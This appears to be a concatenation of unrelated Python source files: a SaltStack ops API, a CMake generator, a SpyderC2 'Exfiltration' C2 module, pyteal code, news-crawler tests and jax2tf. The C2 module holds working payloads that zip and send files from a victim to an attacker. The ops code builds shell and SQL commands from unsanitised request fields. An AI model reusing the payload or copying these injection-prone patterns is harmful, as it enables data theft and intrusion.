command_list.append('cd /tmp/' + project_gitlab_name + ' \n ')
command_list.append('git pull \n ')
command_list.append('cp ' + source + ' ' + source_tmp + ' \n ')
command_list.append(command + ' \n ')
command_list.append('rm -f ' + source_tmp + ' \n ')
command_final = ''.join(command_list)
logger.info('command:' + command_final)
result = salt_api.shell_remote_execution([master_id], command_final)
logger.info('result:' + str(result))
if str(result).__contains__('True'):
return {"status": True, "message": '配置发送成功'}, 200
else:
return {"status": False, "message": '配置发送失败:' + str(result)}, 500
def get_host_project(host):
minion_id = host['minion_id']
db = DB()
status, group_list = db.select('groups', '')
project_name_list = []
try:
for group in group_list:
minion_list = list(group['minion'])
if minion_list.__contains__(minion_id):
project_name_list = project_name_list + group['projects']
except Exception as e:
logger.info('Exception:' + str(e))
db.close_mysql()
return project_name_list
class PingList(Resource):
@access_required(role_dict["common_user"])
def post(self):
logger.info("PingList")
args = parser.parse_args()
db = DB()
host_id = args['host_id']
cipher = args['cipher']
state, result = db.select('host', "where data -> '$.id'='%s'" % host_id)
minion_id = result[0]['minion_id']
logger.info('minion_id:' + minion_id)
product_id = result[0]['product_id']
salt_api = salt_api_for_product(product_id)
state, targets = db.select('target', "where data -> '$.host_id'='%s'" % host_id)
targets_not = []
thread_pool = ThreadPoolExecutor(max_workers=10, thread_name_prefix="target_")
futures = []
for target in targets:
future = thread_pool.submit(pingTarget, target, minion_id, salt_api, cipher)
futures.append(future)
thread_pool.shutdown(wait=True)
for future in futures:
result = future.result()
logger.info(str(result['status']))
if str(result['status']).__contains__("Timeout") | str(result['status']).__contains__("Unknown"):
targets_not.append(result["target"])
return {"status": True, "message": '配置发送成功', "data": targets_not}, 200
def pingTarget(target, minion_id, salt_api, cipher):
command = 'snmpwalk -v 2c -t 0.5 -c \'' + cipher + '\' ' + target["IP"] + ' 1.3.6.1.2.1.1.1'
logger.info(command)
exec_result = salt_api.shell_remote_execution([minion_id], command)
result = {'target': target, 'status': exec_result}
return result
class SinglePing(Resource):
@access_required(role_dict["common_user"])
def post(self):
logger.info("SinglePing")
args = parser.parse_args()
target_id = args['target_id']
cipher = args['cipher']
# Obtain the required parameters: minion_id, product_id, target_ip
db = DB()
state, result = db.select_by_id('target', target_id)
target_ip = result['IP']
host_id = result['host_id']
state, result = db.select_by_id('host', host_id)
minion_id = result['minion_id']
product_id = result['product_id']
salt_api = salt_api_for_product(product_id)
command = 'snmpwalk -v 2c -t 0.5 -c \'' + cipher + '\' ' + target_ip + ' 1.3.6.1.2.1.1.1'
logger.info('command:'+command)
sysDescr = salt_api.shell_remote_execution([minion_id], command)
response_data = {}
if str(sysDescr[minion_id]).__contains__("Timeout") | str(sysDescr[minion_id]).__contains__("Unknown"):
response_data['status'] = '设备网络不通'
else:
response_data['status'] = "设备正常"
response_data['sysDescr'] = str(sysDescr[minion_id])
return {"status": True, "message": '成功', "data": response_data}, 200
class TruncateTarget(Resource):
@access_required(role_dict["common_user"])
def post(self):
logger.info("TruncateTarget")
args = parser.parse_args()
host_id = args['host_id']
db = DB()
state, result = db.delete('target', "where data -> '$.host_id'='%s'" % host_id)
if state:
return {"status": True, "message": '成功'}, 200
else:
return {"status": False, "message": '删除失败'}, 500
|
py | 1a4bb8fd727f04f535faf8aba90dcb096af5490b | # 3_cmakefile_gen.py - helper to create CMakeLists.txt files
# for directory tree of IDL files, to build as merged typesupport static library
# Started 2020Nov09 Neil Puthuff
import sys
import os
file_header = '''# Copyright 2020 Real-Time Innovations
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
include(ConnextDdsRosDdsTypes)
'''
file_midblock = '''
# for unbounded strings & sequences use -DUNBOUNDED_ALL on CMake cmdline
if(UNBOUNDED_ALL)
set(extra_params UNBOUNDED)
endif()
connextdds_generate_ros_dds_types(
LANG ${LANG}
OUTPUT_DIRECTORY "${CMAKE_CURRENT_BINARY_DIR}"
IDL_FILES ${idl_files}
INCLUDE_DIRS ${top_level_source_dir}
${extra_params}
)
'''
cmake_file_opened = False
cmake_libname = ""
# walk along the provided paths, searching for IDL files
for root, dirs, files in os.walk(sys.argv[1]):
# if dirs are listed, prepare to create a CMakeLists.txt file
if len(dirs) > 0:
# there are subdirs; this might be the place to put a CMakeLists.txt file
# if a CMakeLists.txt file is already opened, finish it
if cmake_file_opened == True:
# write remainder of file, then close it.
f_cmake.write("{}".format(file_midblock))
f_cmake.write("add_library( {} OBJECT\n ".format(cmake_libname) + "${generated_file_list}\n)\n\n")
f_cmake.write("set_property(TARGET {} PROPERTY \n POSITION_INDEPENDENT_CODE ON\n)\n\n".format(cmake_libname))
f_cmake.write("target_include_directories({} PRIVATE \n ".format(cmake_libname) + "${CONNEXTDDS_INCLUDE_DIRS}\n ${top_level_binary_dir}\n)\n\n")
f_cmake.write("target_compile_definitions({} PRIVATE \n ".format(cmake_libname) + "${CONNEXTDDS_COMPILE_DEFINITIONS}\n)\n\n")
f_cmake.write("add_dependencies({} \n stdlibrary \n)\n".format(cmake_libname))
f_cmake.close()
cmake_file_opened = False
cmake_file_root = root
# check for IDL files in this dir
if len(files) > 0:
for fcand in files:
if fcand.endswith('.idl'):
if cmake_file_opened == False:
# open file, init with header and such, make libname
f_cmake = open('{}/CMakeLists.txt'.format(cmake_file_root), "w")
f_cmake.write("{}\n".format(file_header))
cmake_file_opened = True
# create libname for this directory
cmake_libname = cmake_file_root.strip(".").strip("/").strip("\\").replace("_", "") + "library"
print("CMakeLists.txt file in {} for {}".format(cmake_file_root, cmake_libname))
# add IDL file to CMakeList.txt file
myDir = os.path.split(root)
f_cmake.write("list(APPEND idl_files \"${CMAKE_CURRENT_SOURCE_DIR}/" + "{}/{}\")\n".format(myDir[1] ,fcand))
if cmake_file_opened == True:
# write remainder of file, then close it.
f_cmake.write("{}".format(file_midblock))
f_cmake.write("add_library( {} OBJECT\n ".format(cmake_libname) + "${generated_file_list}\n)\n\n")
f_cmake.write("set_property(TARGET {} PROPERTY \n POSITION_INDEPENDENT_CODE ON\n)\n\n".format(cmake_libname))
f_cmake.write("target_include_directories({} PRIVATE \n ".format(cmake_libname) + "${CONNEXTDDS_INCLUDE_DIRS}\n ${top_level_binary_dir}\n)\n\n")
f_cmake.write("target_compile_definitions({} PRIVATE \n ".format(cmake_libname) + "${CONNEXTDDS_COMPILE_DEFINITIONS}\n)\n\n")
f_cmake.write("add_dependencies({} \n stdlibrary \n)\n".format(cmake_libname))
f_cmake.close()
cmake_file_opened = False
|
py | 1a4bb91884ec86e41fbdcc424f01762621b7a016 | import sys
import os
import pdb
import pathlib
import time
import base64
sys.path.append(os.path.join(str(pathlib.Path(__file__).parent.resolve()),'../../lib'))
from module import Module
class Exfiltration(Module):
description = 'This module downloads the specified files on victim to the attacker'
@classmethod
def module_options(cls):
h = {
'path' : {'desc' : 'Directory on the attacker machine where the files are downloaded. Default is shared/victim_data/<victim_id>. NOTE : The default path can be accessed in both docker and host, accessibility of custom path will depend on where you run the program.', 'required' : False},
'location' : {'desc': 'Path of directory or file on victim to exfiltrate.','required': True}
}
return h
def __init__(self,name,utility,language,options):
## We are loading the script in the script variable here
super(Exfiltration, self).__init__(name,self.description,utility,language,getattr(self,f"script_{language}")(options))
## This class is called when victim returns the output for the task of this module. What is to be done with the output is defined here
def handle_task_output(self,data,options,victim_id, task_id):
## Default Dumping path
dump_path = os.path.join(str(pathlib.Path(__file__).parent.resolve()),'../../shared/victim_data',victim_id)
if not os.path.exists(dump_path):
os.makedirs(dump_path)
filename = f"exfiltration_file_{task_id}.zip"
filepath = os.path.join(dump_path,filename)
if 'path' in options:
if not os.path.exists(options['path']):
print(f"Provided save path does not exists - {options['path']}. Saving to default directory {filepath}")
else:
filepath = os.path.join(options['path'],filename)
## Check if we have write perms else save to /tmp/SpyderC2
if not os.access(os.path.dirname(filepath), os.W_OK):
dump_path = os.path.join('/tmp','SpyderC2',victim_id)
print(f"No write access to {os.path.dirname(filepath)}. Saving to {dump_path}")
if not os.path.exists(dump_path):
os.makedirs(dump_path,exist_ok=True)
filepath = os.path.join(dump_path,filename)
## Dump the zip file
with open(filepath, "wb") as f:
if self.language == 'python':
f.write(data)
else:
## Incase of powershell we send by base64 encoding
decoded = base64.b64decode(data)
f.write(decoded)
f.close()
output = filepath
return output
def script_python(self,options):
script = """def execute_command():
import os
from os.path import isfile, join
import shutil
location = '##location##'
if isfile(location):
path = shutil.make_archive(location, 'zip',os.path.dirname(location), location)
elif os.path.isdir(location):
path = shutil.make_archive(location, 'zip',location, location)
else:
## Doesn't exist
pass
content = open(path,"rb").read()
return content"""
## TODO - make this through a loop for all params
## TODO - this should be required parameter
if 'location' in options:
value = options['location']
else:
value = options['stager_location']
script = script.replace('##location##',value.replace('\\','\\\\'))
return script
def script_powershell(self,options):
script = """Compress-Archive -Path ##location## -DestinationPath ##location##.zip -Force
$bytes = [System.IO.File]::ReadAllBytes('##location##.zip')
$encoded = [System.Convert]::ToBase64String($bytes)
return $encoded"""
if 'location' in options:
value = options['location']
else:
value = options['stager_location']
script = script.replace('##location##',value)
return script
|
py | 1a4bb92e29270a9bf82996b81ec6788a955deb1b | from typing import Sequence
from ..types import TealType, require_type
from ..errors import TealInputError
from ..ir import TealOp, Op, TealSimpleBlock
from .expr import Expr
class NaryExpr(Expr):
"""N-ary expression base class.
This type of expression takes an arbitrary number of arguments.
"""
def __init__(self, op: Op, inputType: TealType, outputType: TealType, args: Sequence[Expr]):
if len(args) < 2:
raise TealInputError("NaryExpr requires at least two children.")
for arg in args:
if not isinstance(arg, Expr):
raise TealInputError("Argument is not a pyteal expression: {}".format(arg))
require_type(arg.type_of(), inputType)
self.op = op
self.outputType = outputType
self.args = args
def __teal__(self):
start = None
end = None
for i, arg in enumerate(self.args):
argStart, argEnd = arg.__teal__()
if i == 0:
start = argStart
end = argEnd
else:
end.setNextBlock(argStart)
opBlock = TealSimpleBlock([TealOp(self.op)])
argEnd.setNextBlock(opBlock)
end = opBlock
return start, end
def __str__(self):
ret_str = "(" + str(self.op),
for a in self.args:
ret_str += " " + a.__str__()
ret_str += ")"
return ret_str
def type_of(self):
return self.outputType
NaryExpr.__module__ = "pyteal"
def And(*args: Expr) -> NaryExpr:
"""Logical and expression.
Produces 1 if all arguments are nonzero. Otherwise produces 0.
All arguments must be PyTeal expressions that evaluate to uint64, and there must be at least two
arguments.
Example:
``And(Txn.amount() == Int(500), Txn.fee() <= Int(10))``
"""
return NaryExpr(Op.logic_and, TealType.uint64, TealType.uint64, args)
def Or(*args: Expr) -> NaryExpr:
"""Logical or expression.
Produces 1 if any argument is nonzero. Otherwise produces 0.
All arguments must be PyTeal expressions that evaluate to uint64, and there must be at least two
arguments.
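    Example:
        ``Or(Txn.fee() <= Int(10), Txn.amount() == Int(500))``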
"""
return NaryExpr(Op.logic_or, TealType.uint64, TealType.uint64, args)
def Concat(*args: Expr) -> NaryExpr:
"""Concatenate byte strings.
Produces a new byte string consisting of the contents of each of the passed in byte strings
joined together.
All arguments must be PyTeal expressions that evaluate to bytes, and there must be at least two
arguments.
Example:
``Concat(Bytes("hello"), Bytes(" "), Bytes("world"))``
"""
return NaryExpr(Op.concat, TealType.bytes, TealType.bytes, args)
|
py | 1a4bb9746827c065ced671f37c349a377e59cde0 | # encoding=utf-8
# Author: Yu-Lun Chiang
# Description: Test NewsCrawler
import logging
import pytest
from collections import namedtuple
from Sanga.media import wealth
from Sanga.struct import NewsStruct
logger = logging.getLogger(__name__)
TEST_DATA = namedtuple(
typename="TEST_DATA",
field_names=[
"name",
"link",
"expected_output",
],
)
TEST_DATA_1 = TEST_DATA(
name="財訊_1",
link="https://www.wealth.com.tw/home/articles/31815",
expected_output=NewsStruct(
title="三級警戒搶物資 愛之味、味王等「囤貨概念股」動起來 - 財訊雙週刊",
content="\n\n▲隨著政府宣布全台進入三級警戒,不僅實體賣場擠滿民生物資掃貨人潮,網路購物更已大塞車。(圖/攝影組)\n新冠肺炎變種病毒肆虐,本土確認病例暴增,隨著政府宣布雙北進入三級警戒(編按:19日全台升級三級疫情警戒),不僅實體賣場擠滿民生物資掃貨人潮,網路購物更已大塞車,家樂福線上購物不僅暫停「當日配」、新竹以北配送日更只能選擇8~14天;在momo購買快速到貨的消費者也收到簡訊通知,因防疫商品訂單激增,所訂購商品預計5日內配送完成;知名食品廠愛之味(1217)與味王(1203)都表示,這幾天各賣場下單量超多,主要是進入第三級警戒後才開始動起來。\n但究竟只是疫情升溫下的題材反應?還是會帶來實質挹注?對比愛之味疫情相對平穩的今(2021)年第一季合併營收為年減4.91%,再以去(2020)年第一季新冠肺炎疫情剛出現、恐慌情緒也引爆過物資搶購潮為例,該季營收年增15.61%、不僅為17季最大,對屬於需求相對飽和的食品業來說,也是該公司單季營收年增幅極少數超過15%的季度。味王則受限泡麵產能已達極限,去年第一季營收年增6.51%相對平穩、但仍優於今年第一季的年減5.85%。\n泰山(1218)去年第一季營收年增6.18%、相較前一年的年減6.16%為優,主要受惠八寶粥等甜點罐頭也成為搶購標的,但因時值旺季的大宗物資、當中業務用油隨餐飲通路受影響,反倒是疫情不嚴重的今年第一季,大宗物資受惠黃小玉飆漲、營收年增達22.90%;今年因疫情升溫在八寶粥進入旺季、大宗物資開始淡季的第二季,法人表示,旺的會受惠疫情更旺、淡的受衝擊程度減少,加上黃小玉續漲,因此整體營運受惠大於受害。\n就台灣而言,本波疫情為最嚴峻的時刻,第二季的業績是否會超越去年第一季?愛之味表示,雖然賣場這幾天對醬菜、甜點、燕麥奶等產品的下單量超多,但因爆量也才這幾天,受惠幅度還需要再觀察,肯定的是,若時間拉長,對營收會有實質幫助,尤其愛之味主要以B2C的消費食品為主、較無2B部分的干擾。味王在泡麵產能擴增計劃尚未正式啟動下,產能已滿、受惠程度也相對有極限,並且會以供應大賣場、超商、超市等現代通路為優先。\n投資專家又怎麼看疫情下的囤貨概念股?日盛投顧總經理鍾國忠指出,就短期而言,民以食為天、加上食衣住行民生需求不會因為疫情下降,害怕染疫的情緒會讓更多消費者轉往線上採購,不想出門就會多備糧,因此食品股與電商業者業績確實會受惠;另一個角度,食品業在第二季也開始進入傳統旺季,電商更是長期成長的產業,兩者均有長線可保護短線;只是就食品股的受惠程度,同樣生產泡麵與罐頭,股本24億的味王、49億的愛之味,會大於568億的統一(1216)。\n電商的長期成長趨勢,從富邦媒(8454)與網家(8044)月營收持續創同期新高即可理解,富邦媒曾表示,主要還是靠自己本身布局帶來的成長、去年疫情則多了約3/1成長力道的加分;網家也觀察到去年疫情帶來史無前例的流量,只是如何轉為實質業績,坦言持續努力中。\n法人認為,相較於雙11必須各憑本事爭高下,疫情對電商帶來的加分則更為雨露均霑,在瘋搶物資的情緒下,消費者較難去計較平台喜好度與價格划算度;這對於曾表示電商產業已大者恆大的創業家(8477)而言,是其終止連3季虧損的一大契機。\n統整近日防疫物資爆買潮為各家電商帶來的盛況:富邦媒表示,隨著疫情升溫,防疫商品、食品(料理包、米麵、罐頭、冷凍食品等)、民生用品如衛生紙、家用清潔等買氣皆有數倍成長。\n網家也指出,站上防疫生活用品需求持續暴增,包括酒精濕紙巾、抗菌噴霧、洗手機、乾洗手等銷量翻倍,其中口罩銷量近2日飆升36倍、洗手乳銷量亦大幅成長12倍,衛生紙銷量顯著成長3.5倍、抗菌洗衣精及漂白水銷量成長1倍。\n創業家旗下電商平台生活市集、松果購物則觀察到消費者對於防疫相關物資的需求大幅提升,口罩成為最熱銷防疫商品,本土確診案例數開始飆高後,口罩單日整體銷量較平日大幅成長18倍,其中最熱銷款單日銷量逾50萬片。而消毒用的酒精、次氯酸水,免接觸人體的測溫槍,則成為緊追在後的熱銷防疫商品。\n▲味王(TW.1203) 2021/05/20 開36.00 高36.30 低35.15 收35.45 量236張\n(本文由「Money DJ」授權轉載)\n",
keywords=[
"政治",
"財經",
"股市",
"理財",
"投資",
"房地產",
"保險",
"稅務",
"商品",
"期貨",
"企業",
"科技",
"金融",
"生技",
"新產業",
"人物",
"專欄",
"投資高手",
"投資新鮮人",
"專題企業",
"健康醫療",
"美食休閒",
"財訊生活",
"財訊書房",
],
category="股市前線",
media="財訊",
datetime="2021-05-22T07:00:00+08:00",
link="https://www.wealth.com.tw/home/articles/31815",
),
)
TEST_DATA_2 = TEST_DATA(
name="財訊_2",
link="https://www.wealth.com.tw/home/articles/32190",
expected_output=NewsStruct(
title="大盤近月震盪2千點,該衝還是該跑?大股東持股比率增加 Top20:這3檔增幅超過10% - 財訊雙週刊",
content="\n\n▲大盤近月震盪2千點,千張以上大戶增持與減持家數平分秋色。(圖/攝影組) \n近1個月台股行情上沖下洗2千點,雖然千張以上大戶增持與減持家數平分秋色,不過下半年仍有疫情與高基期等變數,跟著大戶籌碼走,可為現階段值得觀察的指標。\n國內新冠疫情爆發已經1個月了,可是每日新增確診的人數仍在3百人以上,雖然近日確診數略降至2百人左右,但由於端午連假疫情發展的不確定性,以及3級警戒再度延長至六月底,未來台股的不確定性似乎也逐漸增高。\n千張大戶消息靈通 動向可為散戶觀察指標\n不過,在這1個月內,加權指數上沖下洗,震盪點數超過2千點,如果不是定力很夠,大概早就被「洗」出場了。而在這個堪稱兵荒馬亂的行情之下,到底後市如何研判,可能要問問產業界第一線的人。\n產業界裡消息最靈通的,除了大股東,大概沒有別人了,尤其是持股千張以上的大股東,絕對算是公司的「消息人士」。因此,如果在這個人心惶惶的時間點,大股東敢趁亂加碼,那就表示公司發展後勢可期;反之,若大股東在此逢高減碼,那麼我們這些散戶投資人可得照子放亮點,一有不對勁,早點腳底抹油、持股減碼才是。\n根據統計資料,近1個月千張以上大股東持股比率增加的共726家,持平的316家,減少持股的712家。雖然光看數字,增持的家數大於減持的家數,但差距不大,算是55波,平分秋色。不過增持的家數與減持的家數都各占了40%,表示大股東調整持股的比率算滿高的。\n接下來,我們分別針對近1個月,大股東增持、減持的前20名做統計分析,請參考附表。\nIC設計各自表現 電子廠憂疫情干擾\n先看近1個月千張大股東持股比率增加的前20名,其中有3檔增幅10%以上,分別是志嘉(5529)、天剛(5310)及晉泰(6221),巧合的是,這三檔都曾謠傳經營權異動情事。\n從這二十檔個股中,可發現半導體相關個股相對較多,包括漢磊(3707)、廣穎(4973)、聯傑(3094)、新唐(4919)、義隆電(2458)等,尤其是以IC設計族群最為明顯,仍是台灣電子產業的主要趨勢。\n接下來,觀察近1個月千張大股東持股比率減少的前20名,當中高達13檔個股是電子股,其餘7檔是傳產股;而電子股當中,面板股占了3檔,包含面板雙虎友達(2409)、群創(3481),以及彩晶(6116)。有趣的是,IC設計也有4檔出現大股東明顯減持的情形,分別是偉詮電(2436)、晶豪科(3006)、宏觀(6568)、富鼎(8261)。\n至於傳產股中,大多是原物料相關,聚亨(2022)、中纖(1718),另外因為本波疫情關係而業績大好的國內物流股嘉里大榮(2608)、台驊投控(2636),大股東亦是趁著本波股價大漲之際,減低手中的持股,畢竟疫情終究有一天會獲得控制,而股價目前在歷史的高檔,大股東抓到機會出脫手中持股,也是理所當然的。\n雖然在統計數據上,近一個月大股東增持的家數與減持的家數相差不多,但如果就增減的力道來看,減持的力道比增持的力道要大得多,評估有2個主要原因,第1個原因是因為疫情控制的速度太慢,產業界已傳出群聚感染,在反應不及的情況下,勢必對於營收會造成衝擊。\n第2個原因是去年的下半年,營收的基期偏高,今年在沒有疫情的干擾下,要較去年大幅成長的機會本來就小,再加上現在疫情延燒,還看不見盡頭在哪,對於下半年產業展望保守,所以趁此時拋售持股。\n無論千張以上股東減持的原因是否就是上述這二個大環境的疑慮,抑或是個別公司的問題,但說到底,只要大股東出現減持現象,投資人終究應該放在心上,謹慎看待。…(更多內容,請參閱最新一期《今周刊》第1277期)\n延伸閱讀:\n除了捐贈75萬劑疫苗 美國還打算找台灣談「這件事」 可能會讓中國更火大\n她駕黑鷹直升機,遭擊落失去雙腿! 50歲生子、更代表美國訪台送疫苗…「活著的每一天,我要對得起救我的人」\n壹電視攝影猝死後確診》走進廁所前毫無異狀!這「4個病徵」易忽略,恐是死亡前兆\n",
keywords=[
"政治",
"財經",
"股市",
"理財",
"投資",
"房地產",
"保險",
"稅務",
"商品",
"期貨",
"企業",
"科技",
"金融",
"生技",
"新產業",
"人物",
"專欄",
"投資高手",
"投資新鮮人",
"專題企業",
"健康醫療",
"美食休閒",
"財訊生活",
"財訊書房",
],
category="股市前線",
media="財訊",
datetime="2021-06-10T10:48:00+08:00",
link="https://www.wealth.com.tw/home/articles/32190",
),
)
TEST_DATA_LIST = [TEST_DATA_1, TEST_DATA_2]
@pytest.fixture(scope="module")
def newsCrawler():
logger.warning("Init News Crawler ...")
return wealth.Wealth()
@pytest.mark.parametrize(
argnames="name, link, expected_output",
argvalues=[tuple(t) for t in TEST_DATA_LIST],
ids=[
f"{t.name}, {t.link[:50]+'...' if len(t.link) > 50 else t.link}"
for t in TEST_DATA_LIST
],
)
def test_get_info(
newsCrawler,
name,
link,
expected_output,
):
output = newsCrawler.getInfo(link=link)
assert NewsStruct.__2dict__(output) == NewsStruct.__2dict__(expected_output)
|
py | 1a4bbb48932f283a8691d35c5e6fbbef854181b1 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Experimental module transforms JAX functions to be executed by TensorFlow."""
import functools
import re
import string
from typing import Any, Callable, Dict, Iterable, List, Optional, Sequence, Tuple, Union
import jax
from jax import ad_util, api, api_util, config
from jax import core, custom_derivatives, dtypes
from jax import linear_util as lu
from jax import numpy as jnp
from jax import random, tree_util
from jax._src import util
from jax.api_util import flatten_fun
from jax.interpreters import ad, batching
from jax.interpreters import masking
from jax.interpreters import pxla
from jax.interpreters import sharded_jit
from jax.interpreters import xla
from jax._src.lax import lax
from jax._src.lax import linalg as lax_linalg
from jax._src.lax import control_flow as lax_control_flow
from jax._src.lax import fft as lax_fft
import jax._src.random
from jax.lib import xla_bridge as xb
import numpy as np
import tensorflow as tf # type: ignore[import]
# These don't have public equivalents.
# pylint: disable=g-direct-tensorflow-import
from tensorflow.compiler.tf2xla.python import xla as tfxla # type: ignore[import]
from tensorflow.compiler.xla import xla_data_pb2 # type: ignore[import]
from tensorflow.compiler.xla.experimental.xla_sharding import xla_sharding # type: ignore[import]
# pylint: enable=g-direct-tensorflow-import
from jax.lib import xla_client
# The scope name need to be a valid TensorFlow name. See
# https://github.com/tensorflow/tensorflow/blob/r2.3/tensorflow/core/framework/node_def_util.cc#L731
_VALID_SCOPE_REGEX = re.compile("^[A-Za-z0-9.][A-Za-z0-9_.\\/>-]*$")
_INVALID_SCOPE_CHAR = re.compile("[^A-Za-z0-9_.\\/>-]")
def _sanitize_scope_name(name):
scope_name = _INVALID_SCOPE_CHAR.sub("_", name)
if not _VALID_SCOPE_REGEX.match(scope_name):
scope_name = ".{}".format(scope_name)
return scope_name
# A value suitable in a TF tracing context: tf.Tensor, tf.Variable,
# or Python scalar or numpy.ndarray. (A tf.EagerTensor is a tf.Tensor.)
TfVal = Any
DType = Any
def _is_tfval(v: TfVal) -> bool:
if isinstance(v, (tf.Tensor, tf.Variable)):
return True
try:
# Note: this conversion is overkill and just intended as a type check; this code
# is in principle only run if core.skip_checks is False.
# TODO: it is not true that this code is run only without skip_checks
_safe_convert_to_tensor(v)
return True
except ValueError:
return False
def _safe_convert_to_tensor(val, dtype=None) -> TfVal:
dtype = dtype if dtype else (val.dtype if hasattr(val, "dtype") else None)
conversion_type = to_tf_dtype(dtype) if dtype else None
# We can convert directly, because all dtypes (even bfloat16) are the same
# in JAX and TF.
return tf.convert_to_tensor(val, dtype=conversion_type)
# The implementation rules for primitives. The rule will be called with the
# arguments (TfVal) and must return TfVal (or a sequence thereof,
# if primitive.multiple_results). The vast majority of primitives do not need
# to worry about core.unit inputs or results. The exception are primarily the
# control-flow primitives.
tf_impl: Dict[core.Primitive,
Callable[..., Any]] = {}
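# As an illustrative sketch of how a rule is registered (the actual registrations are
# not shown in this excerpt): a simple elementwise primitive can map directly to the
# matching TF op, e.g. tf_impl[lax.neg_p] = tf.math.negative.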
# Some primitive implementation rules need the abstract values of arguments
# and the results. This is the case for the primitives implemented using
# _convert_jax_impl and those that need to adjust the shape of the outputs
# due to missing TF shape inference rules for TFXLA ops. The rules for these
# primitives should be added to `tf_impl_with_avals`.
# The abstract value are passed to the implementation as two special kwargs
# `_in_avals` (a tuple of core.AbstractValue) and `_out_aval` (a
# core.AbstractValue, or a tuple thereof when primitive.multiple_results).
tf_impl_with_avals: Dict[core.Primitive,
Callable[..., Any]] = {}
# XLA is not linked in all environments; when converting a primitive, if this
# variable is disabled, we try harder to use only standard TF ops if they are
# applicable to the concrete use case; if the resulting conversion path ends up
# requiring a TFXLA operation, an exception is thrown instead.
_enable_xla = True
def _xla_path_disabled_error(primitive_name: str) -> Exception:
assert not _enable_xla
return NotImplementedError(
f"Call to {primitive_name} can only be converted through TFXLA, but "
"XLA is disabled")
def convert(fun: Callable, *,
in_shapes: Optional[Sequence[Any]]=None,
with_gradient=True, enable_xla=True) -> Callable:
"""Transforms `fun` to be executed by TensorFlow.
See [README](https://github.com/google/jax/blob/master/jax/experimental/jax2tf/README.md)
for more details about usage and common problems.
Args:
fun: Function to be transformed. Its arguments and return value should be
JAX arrays, or (nested) standard Python containers (tuple/list/dict)
thereof.
in_shapes: an optional sequence of shape specifications,
one for each argument of the function to be converted. Default is a
list of `None`, in which case the argument shape specifications are taken
from the shapes of the actual arguments.
A non-default `in_shapes` is needed sometimes when the actual arguments
have partially-specified shapes. If an argument is a pytree, then the
shape specification must be a matching pytree or `None`.
See [how optional parameters are matched to arguments](https://jax.readthedocs.io/en/latest/pytrees.html#applying-optional-parameters-to-pytrees).
A shape specification should be a string, with comma-separated dimension
specifications, and optionally wrapped in parentheses. A dimension
specification is either a number, or the placeholder `_`, or a lowercase
word denoting a name for a dimension variable, or an arithmetic expression
with integer literals, dimension variables, and the operators `+` and `*`.
In presence of dimension variables, the conversion is done with a
shape abstraction that allows any concrete value for the variable.
Examples of shape specifications:
* `[None, "(batch, 16)"]`: no specification for the first argument (takes
the shape from the actual argument); the second argument is a 2D
array with the first dimension size set to a variable `batch` and the
second dimension 16.
* `["(batch, _)", "(batch,)"]`: the leading dimensions of the two arguments
must match. The second dimension of the first argument is taken from the
actual argument shape.
* `["(batch, 2 * batch)"]`: a 2D matrix with the second dimension having
double the size of the first one.
See [the README](https://github.com/google/jax/blob/master/jax/experimental/jax2tf/README.md#shape-polymorphic-conversion)
for more details.
with_gradient: if set, will add a tf.custom_gradient to the converted
function, by converting the ``jax.vjp(fun)``. Only first-order
differentiation is supported for now. If the converted function is
saved in a SavedModel, the custom gradients are currently lost and
an error will be raised if a gradient computation is attempted.
This is due to a current bug in TensorFlow.
enable_xla: if unset, the converter will try harder to use pure TF ops to
convert the function, and raise an error if it can not be converted
without resorting to XLA ops (default: True).
Returns:
A version of `fun` that expects TfVals as arguments (or
tuple/lists/dicts) thereof, and returns TfVals as outputs.
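  Example (an illustrative usage sketch; assumes a TF 2.x eager or `tf.function` context):

    def f_jax(x):
      return jnp.sin(jnp.cos(x))

    # Convert with a shape-polymorphic leading (batch) dimension:
    f_tf = convert(f_jax, in_shapes=["(batch, 4)"])
    y = f_tf(tf.ones((3, 4), dtype=tf.float32))  # a tf.Tensor of shape (3, 4)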
"""
global _enable_xla
_enable_xla = enable_xla
api._check_callable(fun)
def converted_fun(*args: TfVal) -> TfVal:
# TODO: is there a better way to check if we are inside a transformation?
if config.omnistaging_enabled:
if not core.trace_state_clean():
raise ValueError("convert must be used outside all JAX transformations."
+ f"Trace state: {core.thread_local_state.trace_state}")
else:
if (core.thread_local_state.trace_state.trace_stack.downward or
core.thread_local_state.trace_state.trace_stack.upward or
core.thread_local_state.trace_state.substack != [core.Sublevel(0)]):
raise ValueError("convert must be used outside all JAX transformations."
+ f"Trace state: {core.thread_local_state.trace_state}")
def check_arg(a):
if not _is_tfval(a):
msg = (f"Argument {a} of type {type(a)} of jax2tf.convert(f) should "
"be NumPy array, scalar, tf.Variable, or tf.Tensor")
raise TypeError(msg)
tree_util.tree_map(check_arg, args)
# Name input tensors
args = tuple(
tree_util.tree_map(lambda x, i=i: tf.identity(x, f"jax2tf_arg_{i}"), a) # type: ignore
for i, a in enumerate(args))
# This function may take pytrees of TfVals. We can only set
# tf.custom_gradient on functions that take a flat argument list.
args_flat, in_tree = tree_util.tree_flatten((args, {}))
if in_shapes is None:
in_shapes_ = (None,) * len(args)
else:
if not isinstance(in_shapes, Sequence) or len(args) != len(in_shapes):
msg = ("in_shapes must be a sequence as long as the argument list "
f"({len(args)}). Got in_shapes={in_shapes}.")
raise TypeError(msg)
in_shapes_ = tuple(in_shapes)
# Expand the in_shapes to match the argument pytree
in_shapes_flat = tuple(api_util.flatten_axes("jax2tf.convert in_shapes",
in_tree.children()[0], in_shapes_))
# Construct the abstract values for the flat arguments, possibly based on
# the input shapes and the in_shapes if given. May create new shape
# variables.
args_avals_flat = _input_avals(args_flat, in_shapes_flat)
f = lu.wrap_init(fun)
# out_tree_thunk() will be the output tree, after running _interpret_fun.
flat_fun, out_tree_thunk = flatten_fun(f, in_tree)
# Prepare the grad_fn for tf.custom_gradient.
